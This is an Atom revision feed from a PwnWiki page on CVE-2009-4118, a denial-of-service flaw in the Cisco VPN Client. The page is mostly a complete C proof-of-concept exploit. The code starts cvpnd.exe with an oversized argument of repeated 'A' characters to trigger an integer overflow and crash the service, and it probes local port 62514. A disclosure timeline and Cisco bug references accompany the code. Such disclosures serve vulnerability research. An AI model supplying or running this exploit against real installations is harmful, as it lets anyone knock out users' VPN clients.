<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2009-4118_Cisco_VPN_Client%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2009-4118 Cisco VPN Client拒絕服務漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2009-4118_Cisco_VPN_Client%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2009-4118_Cisco_VPN_Client%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-17T01:41:31Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2009-4118_Cisco_VPN_Client%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;diff=898&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==INFO== &lt;pre&gt; # CVE-2009-4118 Cisco VPN Client - Integer Overflow Denial of Service  Exploit-DB publication at  https://www.exploit-db.com/exploits/10190/  # Cisco official I...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2009-4118_Cisco_VPN_Client%E6%8B%92%E7%B5%95%E6%9C%8D%E5%8B%99%E6%BC%8F%E6%B4%9E&amp;diff=898&amp;oldid=prev"/>
		<updated>2021-04-02T04:10:03Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==INFO== &amp;lt;pre&amp;gt; # CVE-2009-4118 Cisco VPN Client - Integer Overflow Denial of Service  Exploit-DB publication at  https://www.exploit-db.com/exploits/10190/  # Cisco official I...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==INFO==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# CVE-2009-4118&lt;br /&gt;
Cisco VPN Client - Integer Overflow Denial of Service&lt;br /&gt;
&lt;br /&gt;
Exploit-DB publication at  https://www.exploit-db.com/exploits/10190/&lt;br /&gt;
&lt;br /&gt;
# Cisco official Intelligence AlertID 19445 and Credits &lt;br /&gt;
&lt;br /&gt;
http://tools.cisco.com/security/center/viewAlert.x?alertId=19445&lt;br /&gt;
&lt;br /&gt;
![cve-2009-4118](https://user-images.githubusercontent.com/3140111/40872784-98bb237a-6654-11e8-9a77-7fb94a8edf1d.png)&lt;br /&gt;
&lt;br /&gt;
# Author &lt;br /&gt;
Alex Hernandez aka &amp;lt;em&amp;gt;&amp;lt;a href=&amp;quot;https://twitter.com/_alt3kx_&amp;quot; rel=&amp;quot;nofollow&amp;quot;&amp;gt;(@\_alt3kx\_)&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/*&lt;br /&gt;
Cisco VPN client version 5.0.03.0560&lt;br /&gt;
Cisco VPN client Version 5.0.04.0300&lt;br /&gt;
Cisco VPN client Version 5.0.05.0290&lt;br /&gt;
Cisco VPN client Version 4.8.02.0010 &lt;br /&gt;
*/&lt;br /&gt;
&lt;br /&gt;
/* &lt;br /&gt;
 * Cisco VPN Client 0day Integer overflow (DOS) Proof Of Concept Code&lt;br /&gt;
 *&lt;br /&gt;
 * By Alex Hernandez aka alt3kx (c) November 2009&lt;br /&gt;
 *&lt;br /&gt;
 * This POC is only for test. If an application read a malformed chars &lt;br /&gt;
 * file like this POC, the application will be crashed.&lt;br /&gt;
 *&lt;br /&gt;
 * We tested this code on:&lt;br /&gt;
 *&lt;br /&gt;
 * Windows Vista Bussines SP1 Spanish&lt;br /&gt;
 * Windows Vista Home Premium  SP1 English&lt;br /&gt;
 * Windows 2000 Server English&lt;br /&gt;
 * Windows XP Professional SP3&lt;br /&gt;
 *&lt;br /&gt;
 * Cisco VPN client version 5.0.03.0560&lt;br /&gt;
 * Cisco VPN client Version 5.0.04.0300&lt;br /&gt;
 * Cisco VPN client Version 5.0.05.0290&lt;br /&gt;
 * Cisco VPN client Version 4.8.02.0010&lt;br /&gt;
 * &lt;br /&gt;
 * Compiled on VC++ win32&lt;br /&gt;
 *  &lt;br /&gt;
 * Friends:&lt;br /&gt;
 * sirdarckcat, nitr0us, hkm, crypkey, xDAWN, canit0, chr1x&lt;br /&gt;
 *&lt;br /&gt;
 * TT &amp;amp; DSRT&lt;br /&gt;
 * daSh, p4r4n01ds, darkslaker, beto, motis. &lt;br /&gt;
 *&lt;br /&gt;
 * Very special credits to:&lt;br /&gt;
 *&lt;br /&gt;
 * str0ke (milw0rm.com)&lt;br /&gt;
 * rathaus (securiteam.com)&lt;br /&gt;
 * FX (Phenoelit.de)&lt;br /&gt;
 * dSR! (segfault.es)&lt;br /&gt;
 * 0dd (0dd.com)&lt;br /&gt;
 * &lt;br /&gt;
 * &lt;br /&gt;
 * PH-Neutral 0x7d9, We hope to see u there intruders&lt;br /&gt;
 * &lt;br /&gt;
 * ---------------&lt;br /&gt;
 * Report Timeline &lt;br /&gt;
 * ---------------&lt;br /&gt;
 * 06/03/2009	The vulnerability was discovered.&lt;br /&gt;
 * 07/03/2009	Exploit/PoC code was developed (private).&lt;br /&gt;
 * 09/03/2009	Cisco PSIRT was notified about the issue.&lt;br /&gt;
 * 11/03/2009	Vendor response asking for details of the testing environment.&lt;br /&gt;
 * 12/03/2009	Test scenario explained and sent a PDF document with details.&lt;br /&gt;
 * 16/03/2009	Developers/PSIRT confirmed the vulnerability.&lt;br /&gt;
 * 19/03/2009	New test scenarios around new versions (CISCO VPN client).&lt;br /&gt;
 * 23/03/2009	CISCO PSIRT assing an internal tracking PSIRT-0676131279.&lt;br /&gt;
 * 23/03/2009	CISCO PSIRT assing an Bug ID-CSCsz49276.&lt;br /&gt;
 * 15/04/2009	New Advisory release (private).&lt;br /&gt;
 * 16/04/2009	New PSIRT feedback no ETA avaiable.&lt;br /&gt;
 * 23/04/2009	The development team working the fix.&lt;br /&gt;
 * 01/05/2009	The development team estimated one month to fix.&lt;br /&gt;
 * 01/06/2009	New PSIRT feedback, no ETA available.&lt;br /&gt;
 * 29/06/2009	The development team estimated one month to fix.&lt;br /&gt;
 * 28/07/2009	The development team working on maitenance release.&lt;br /&gt;
 * 28/07/2009	The development team estimated one month to fix.&lt;br /&gt;
 * 02/09/2009	New vulnerabilities found on CISCO VPN client.&lt;br /&gt;
 * 02/09/2009	The development team can not publish the new version 5.0.6.&lt;br /&gt;
 * 02/09/2009	The development team working on maitenance release.&lt;br /&gt;
 * 02/09/2009	The development team estimated one month to fix.&lt;br /&gt;
 * 10/09/2009	The BETA program should be finished by the end of Oct &lt;br /&gt;
 * and the client posted next month.&lt;br /&gt;
 * 07/10/2009	The development team estimated one month to fix.&lt;br /&gt;
 * 11/11/2009	New PSIRT feedback RNA avaiable.&lt;br /&gt;
 * 19/11/2009	The vulnerability goes public and PSIRT is informed.&lt;br /&gt;
 * 19/11/2009	Fix and details will available on CISCO Intellishield Alert &amp;amp; Bug Tool kit.&lt;br /&gt;
 * &lt;br /&gt;
 * CISCO Fix and Details:&lt;br /&gt;
 * &lt;br /&gt;
 * BugToolKit:&lt;br /&gt;
 * http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&amp;amp;bugId=CSCsz49276&lt;br /&gt;
 *&lt;br /&gt;
 * Intellishield Alert:&lt;br /&gt;
 * http://tools.cisco.com/security/center/viewAlert.x?alertId=19445&lt;br /&gt;
 * &lt;br /&gt;
 */&lt;br /&gt;
 &lt;br /&gt;
#include &amp;lt;windows.h&amp;gt;&lt;br /&gt;
#include &amp;lt;winsock.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#pragma comment ( lib, &amp;quot;ws2_32.lib&amp;quot; )&lt;br /&gt;
 &lt;br /&gt;
int CheckPortUDP( short int nPort )&lt;br /&gt;
{&lt;br /&gt;
    struct sockaddr_in nSockServer;&lt;br /&gt;
 &lt;br /&gt;
    WSADATA wsaData;&lt;br /&gt;
 &lt;br /&gt;
    int lBusy = 0;&lt;br /&gt;
    int nSocket;&lt;br /&gt;
 &lt;br /&gt;
    /* Initialization */&lt;br /&gt;
    if( WSAStartup( 0x0101, &amp;amp;wsaData ) == 0 )&lt;br /&gt;
    {&lt;br /&gt;
        /* Create Socket */&lt;br /&gt;
        nSockServer.sin_family      = AF_INET;&lt;br /&gt;
        nSockServer.sin_port        = htons( nPort );&lt;br /&gt;
        nSockServer.sin_addr.s_addr = inet_addr( &amp;quot;127.0.0.1&amp;quot; );&lt;br /&gt;
 &lt;br /&gt;
        /* Check UDP Protocol */&lt;br /&gt;
        nSocket = socket( AF_INET, SOCK_DGRAM, 0 );&lt;br /&gt;
 &lt;br /&gt;
        lBusy = ( bind( nSocket, (SOCKADDR FAR *) &amp;amp;nSockServer,&lt;br /&gt;
                            sizeof( SOCKADDR_IN ) ) == SOCKET_ERROR );&lt;br /&gt;
 &lt;br /&gt;
        /* Close Socket if Busy */&lt;br /&gt;
        if( lBusy )&lt;br /&gt;
            closesocket( nSocket );&lt;br /&gt;
 &lt;br /&gt;
        /* Close Winsock */&lt;br /&gt;
        WSACleanup();&lt;br /&gt;
    }&lt;br /&gt;
 &lt;br /&gt;
    /* Return */&lt;br /&gt;
    return( lBusy );&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
int CheckPortTCP( short int nPort )&lt;br /&gt;
{&lt;br /&gt;
    struct sockaddr_in nSockServer;&lt;br /&gt;
 &lt;br /&gt;
    WSADATA wsaData;&lt;br /&gt;
 &lt;br /&gt;
    int lBusy = 0;&lt;br /&gt;
    int nSocket;&lt;br /&gt;
 &lt;br /&gt;
    /* Initialization */&lt;br /&gt;
    if( WSAStartup( 0x0101, &amp;amp;wsaData ) == 0 )&lt;br /&gt;
    {&lt;br /&gt;
        /* Create Socket */&lt;br /&gt;
        nSockServer.sin_family      = AF_INET;&lt;br /&gt;
        nSockServer.sin_port        = htons( nPort );&lt;br /&gt;
        nSockServer.sin_addr.s_addr = inet_addr( &amp;quot;127.0.0.1&amp;quot; );&lt;br /&gt;
 &lt;br /&gt;
        /* Check TCP Protocol */&lt;br /&gt;
        nSocket = socket( AF_INET, SOCK_STREAM, 0 );&lt;br /&gt;
 &lt;br /&gt;
        lBusy = ( connect( nSocket, (struct sockaddr *) &amp;amp;nSockServer,&lt;br /&gt;
                     sizeof( nSockServer ) ) == 0 );&lt;br /&gt;
 &lt;br /&gt;
        /* Close Socket if Busy */&lt;br /&gt;
        if( lBusy )&lt;br /&gt;
            closesocket( nSocket );&lt;br /&gt;
 &lt;br /&gt;
        /* Close Winsock */&lt;br /&gt;
        WSACleanup();&lt;br /&gt;
    }&lt;br /&gt;
 &lt;br /&gt;
    /* Return */&lt;br /&gt;
    return( lBusy );&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
int main(void)&lt;br /&gt;
{&lt;br /&gt;
&lt;br /&gt;
	char szPath[] = &amp;quot;C:\\Program Files\\Cisco Systems\\VPN Client\\cvpnd.exe&amp;quot;;&lt;br /&gt;
	//uncomment this line for Windows XP Spanish versions&lt;br /&gt;
	//char szPath[] = &amp;quot;C:\\Archivos de programa\\Cisco Systems\\VPN Client\\cvpnd.exe&amp;quot;;&lt;br /&gt;
	char buffer[] = &amp;quot;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&amp;quot;;&lt;br /&gt;
	PROCESS_INFORMATION pif;&lt;br /&gt;
	STARTUPINFO si;&lt;br /&gt;
	ZeroMemory(&amp;amp;si,sizeof(si));&lt;br /&gt;
	si.cb = sizeof(si);&lt;br /&gt;
&lt;br /&gt;
	BOOL bRet = CreateProcess(&lt;br /&gt;
        szPath,&lt;br /&gt;
        buffer,&lt;br /&gt;
        NULL,&lt;br /&gt;
        NULL,&lt;br /&gt;
        FALSE,&lt;br /&gt;
        0,&lt;br /&gt;
        NULL,&lt;br /&gt;
        NULL,&lt;br /&gt;
        &amp;amp;si,&lt;br /&gt;
        &amp;amp;pif);&lt;br /&gt;
	&lt;br /&gt;
	system(&amp;quot;cls&amp;quot;);&lt;br /&gt;
	printf(&amp;quot;\n .:: Cisco VPN Client 0day Integer overflow (DoS) Proof Of Concept Code ::.\n&amp;quot;);&lt;br /&gt;
	printf(&amp;quot; .:: By Alex Hernandez aka alt3kx (c) November 2009 .::\n\n&amp;quot;);  &lt;br /&gt;
&lt;br /&gt;
	&lt;br /&gt;
	/* Check for TCP Port */&lt;br /&gt;
 &lt;br /&gt;
    if( CheckPortTCP(62514) )&lt;br /&gt;
        printf(&amp;quot;[+] Cisco VPN Client TCP port listening\t[OK!]\n&amp;quot;);&lt;br /&gt;
    else&lt;br /&gt;
        printf(&amp;quot;[+] Cisco VPN Client TCP Port isn't Busy\t[Wrong!]\n&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
    /* Check for UDP Port */&lt;br /&gt;
 &lt;br /&gt;
    if( CheckPortUDP(62514) )&lt;br /&gt;
        printf(&amp;quot;[+] Cisco VPN Client UDP port listening\t[OK!]\n&amp;quot;);&lt;br /&gt;
    else&lt;br /&gt;
        printf(&amp;quot;[+] Cisco VPN Client UDP Port isn't Busy\t[Wrong!]\n&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
	if(bRet == FALSE){MessageBox(HWND_DESKTOP,&amp;quot;Unable to start program check the default PATH Cisco VPN Client cvpnd.exe\n&amp;quot;,&amp;quot;&amp;quot;,MB_OK);&lt;br /&gt;
    return 1;}&lt;br /&gt;
&lt;br /&gt;
	else if (bRet == TRUE){MessageBox(HWND_DESKTOP,&amp;quot;Attempting exploit Cisco VPN DoS exploit...&amp;quot;,&amp;quot;&amp;quot;,MB_OK);&lt;br /&gt;
		printf(&amp;quot;\n[+] Few seconds to crash the program...\n&amp;quot;);&lt;br /&gt;
		printf(&amp;quot;[+] Exploit success...\n\n&amp;quot;);&lt;br /&gt;
	return 1;} &lt;br /&gt;
&lt;br /&gt;
    CloseHandle(pif.hProcess);&lt;br /&gt;
    CloseHandle(pif.hThread);&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>